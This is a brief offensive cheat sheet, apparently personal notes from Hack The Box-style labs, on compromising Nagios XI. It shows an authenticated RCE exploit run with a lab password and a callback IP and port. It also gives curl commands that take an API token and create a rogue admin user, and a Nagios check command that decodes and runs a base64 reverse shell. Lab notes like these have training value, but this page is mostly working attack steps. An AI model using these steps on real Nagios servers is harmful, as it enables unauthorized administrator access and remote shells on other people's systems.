Nagios XI

Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)

https://www.exploit-db.com/exploits/49422

Example of exploitation:

Intrusionz3r0@htb[/htb]$ python3 nagiosxi-rce.py 'http://monitoring.inlanefreight.local/' nagiosadmin 'oilaKglm7M09@CPL&^lC' 10.10.14.33 1234

API

#Create token via username and password
curl -X POST 'http://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=4"

#Authentication
curl -X GET 'https://nagios.monitored.htb/nagiosxi/?token=b462f0aa7db06a776873138e22fd5002b4cb3f01'

#Create Admin user
curl -k -X POST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d "username=intrusionz3r0&password=intrusionz3r0&name=intrusionz3r0&email=intrusionz3r0@monitored.htb&auth_level=admin"

Remote Command Executiion via authenticate admin user

Configure → Core config mananger → Commands

Create command:

bash -c 'echo "base64revshell" | base64 -d | bash'

Configure → Core config mananger → Services → add new → Run Check command

Last updated